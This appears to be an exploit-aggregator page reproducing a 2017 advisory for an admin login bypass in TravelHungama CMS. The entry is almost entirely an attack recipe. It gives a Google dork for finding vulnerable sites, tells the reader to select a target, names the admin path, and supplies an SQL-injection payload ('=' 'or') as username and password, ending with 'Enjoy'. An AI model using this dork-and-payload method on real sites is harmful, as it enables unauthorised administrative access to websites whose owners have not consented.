Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017100100

Below is a copy:

TravelHungama Cms Admin Login Bypass
###########################
# Exploit Title: TravelHungama Cms Admin Login Bypass
# Google Dork: Powered By: TravelHungama
# Date: 2017/10/12
# Exploit Author: Iran Cyber Security Group
# Vendor Homepage: http://www.travelhungama.com/
# Version: All Version
# Tested on: Win
# CVE : N/A
###########################
# Exploit :
# Search Google Dork And Select A Target
# Admin Page : site.com/admin
# Username & Password : '=' 'or'
# Enjoy :)
###########################
#Discovered by : Iran Cyber Security Group
###########################

Copyright ©2017 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.